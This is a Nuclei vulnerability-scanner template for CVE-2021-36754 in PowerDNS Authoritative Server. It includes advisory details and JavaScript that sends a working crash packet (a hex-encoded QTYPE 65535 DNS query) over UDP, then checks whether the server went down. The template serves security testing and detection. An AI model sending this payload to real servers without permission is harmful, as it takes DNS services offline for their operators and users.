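id: CVE-2021-36754

info:
  name: PowerDNS Authoritative Server - Denial of Service
  author: daffainfo
  severity: high
  description: |
    PowerDNS Authoritative Server 4.5.0 before 4.5.1 allows anybody to crash the process by sending a specific query (QTYPE 65535) that causes an out-of-bounds exception.
  impact: |
    Attackers can crash the server process, leading to denial of service and potential service disruption.
  remediation: |
    Upgrade to version 4.5.1 or later.
  reference:
    - http://www.openwall.com/lists/oss-security/2021/07/26/2
    - https://doc.powerdns.com/authoritative/security-advisories/powerdns-advisory-2021-01.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36754
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2021-36754
    cwe-id: CWE-119
    epss-score: 0.91828
    epss-percentile: 0.99703
    cpe: cpe:2.3:a:powerdns:authoritative_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: powerdns
    product: authoritative_server
  tags: cve,cve2021,js,dns,powerdns,authoritative_server,dos,intrusive,vkev

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      // Crash-based check: fingerprint the server, send the QTYPE 65535 query,
      // then re-probe. A positive result means the daemon stopped answering,
      // so a hit implies an outage on the target until the service is restarted.
      const c = require("nuclei/net");
      const address = `${Host}:${Port}`;

      // Benign version.bind query (TXT, class CH); used as fingerprint and as liveness probe.
      const validPacket = "1ea0012000010000000000010776657273696f6e0462696e64000010000300002904d000000000000c000a00089f750bc0808677d1";
      // Query with QTYPE 65535 (0xffff), the trigger named in the description.
      const dosPacket = "296e01200001000000000001046f617374026d6500ffff000100002904d000000000000c000a000805dbdf1a40effcf4";

      // Sends the benign query and returns the reply text.
      // The socket is closed on every path, including when the read fails.
      function probeVersion() {
        const conn = c.Open('udp', address);
        try {
          conn.SendHex(validPacket);
          // NOTE(review): relies on RecvString throwing when no reply arrives - confirm
          return conn.RecvString();
        } finally {
          conn.Close();
        }
      }

      // Step 1: fingerprint. No reply or another product means "not PowerDNS".
      let isPowerdns = false;
      try {
        isPowerdns = probeVersion().includes("PowerDNS Authoritative Server");
      } catch {
        isPowerdns = false;
      }

      // Step 2: the crash query is sent only to a server that identified itself as
      // PowerDNS Authoritative Server. Other DNS servers are never sent it, and the
      // verdict for them is "Not Vulnerable" either way.
      let isUp = true;
      if (isPowerdns) {
        const conn = c.Open('udp', address);
        try {
          conn.SendHex(dosPacket);
          try {
            conn.RecvString();
          } catch {
            // No reply is expected from a server that crashed.
          }
        } finally {
          conn.Close();
        }

        // Step 3: liveness re-probe. A single lost UDP datagram also reads as
        // "down", so confirm a hit against the service state before reporting.
        try {
          probeVersion();
          isUp = true;
        } catch {
          isUp = false;
        }
      }

      if (isPowerdns && !isUp) {
        Export("Vulnerable to CVE-2021-36754")
      } else {
        Export("Not Vulnerable")
      }
    args:
      Host: "{{Host}}"
      Port: 53

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Vulnerable to CVE-2021-36754'

      - type: dsl
        dsl:
          - success == true
# NOTE(review): the digest below was computed over the original template text; re-sign after editing.
# digest: 490a0046304402203d26824efdd6c34b4f8fdc8fc082ad0655e2fa56c4b41741b0a3286acbed236d02206774c48b525e72d28da8101ff122fd934c5308ac21218b2644f4885c043be92a:922c64590222798bb761d5b6d8e72950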